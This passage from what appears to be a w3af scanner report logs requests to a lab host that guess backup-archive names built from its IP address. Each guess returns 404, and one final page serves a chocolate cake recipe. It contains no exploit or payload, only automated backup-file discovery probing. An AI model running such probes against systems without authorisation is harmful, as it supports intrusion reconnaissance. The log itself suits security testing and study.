            </http-transaction>
            <http-transaction id="231">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="234">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="235">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="236">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="237">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="238">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="239">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="241">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="242">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="243">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="244">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="245">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="246">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="247">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="248">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="249">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="250">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="251">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="252">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="253">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="257">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
